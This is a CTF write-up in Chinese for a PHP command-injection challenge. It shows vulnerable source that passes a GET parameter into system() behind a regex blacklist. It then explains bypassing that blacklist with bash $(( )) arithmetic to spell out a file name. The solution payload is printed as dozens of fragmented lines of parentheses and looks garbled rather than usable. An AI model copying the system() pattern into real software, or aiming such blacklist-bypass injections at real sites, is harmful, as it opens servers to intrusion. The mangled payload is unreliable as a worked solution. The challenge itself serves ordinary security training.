源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
system("cat ".$c.".php");
}
}else{
highlight_file(__FILE__);
}
思路
$(())可以用来表示数字
题解
?c=
(
(
((~
(( ((
(
(
((~
(( (())))
(
(
((~
(( (())))
(
(
((~
(( (())))
(
(
((~
(( (())))
(
(
((~
(( (())))
(
(
((~
(( (())))$((~
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))((~
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))((~
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))((~
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))(($(())))$((
(
(
)
)
)
)
(())))
(())))((~
(
(
)
)
)
)
(())))
(())))(($(())))$(($(())))))))
总结
水题